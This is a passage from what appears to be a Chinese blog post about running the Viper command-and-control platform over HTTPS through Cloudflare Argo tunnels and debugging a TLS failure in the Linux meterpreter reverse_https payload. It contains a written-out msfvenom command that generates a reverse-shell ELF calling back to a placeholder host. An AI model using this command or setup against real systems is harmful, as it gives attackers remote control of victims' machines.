misaka
misaka
[Viper-cloudflare-argo-https上线](https://mi3aka.eu.org/2022/07/19/Viper%E5%88%9D%E4%BD%93%E9%AA%8C/#https%E4%B8%8A%E7%BA%BF) 在参考[Tokisaki-Galaxy师傅](https://github.com/Tokisaki-Galaxy)的[issue #66](https://github.com/FunnyWolf/Viper/issues/66)和[issue #72](https://github.com/FunnyWolf/Viper/issues/72)后利用argo成功上线https 但存在两个问题 1. 使用Tokisaki-Galaxy师傅的http方法上线时,似乎存在问题,因此我进行了修改 2. 使用https方法进行上线时,`windows/x64/meterpreter/reverse_https`可以正常使用,但是使用`linux/x64/meterpreter_reverse_https`进行上线时会由于TLS版本的问题无法正常上线,推测是msf的问题 ELF在链接时的抓包 data:image/s3,"s3://crabby-images/7c5e2/7c5e231f0783a3b21692d41989b58ff1d8c07ea9" alt="" data:image/s3,"s3://crabby-images/dcb80/dcb80f110bcef85b8bdb0300bd8a1294f5c68bab" alt="" 直接curl data:image/s3,"s3://crabby-images/a5532/a55320d266724f808511ef26670fa69fbc6bb58e" alt="" 限制curl的tls版本 data:image/s3,"s3://crabby-images/5bbe2/5bbe272cf5354543c59bfa32dfd09d41724c3993" alt="" >解决方法:暂无 我使用`msfvenom -p linux/x64/meterpreter_reverse_https lhost=test1.example.com lport=443 -f elf -o https.elf`手动生成一个elf再次进行测试 发现其同样使用`TLSv1`进行链接,推测问题出现在`msf`身上,可能的关联msf-issue如下 [metasploit-framework reverse_https does...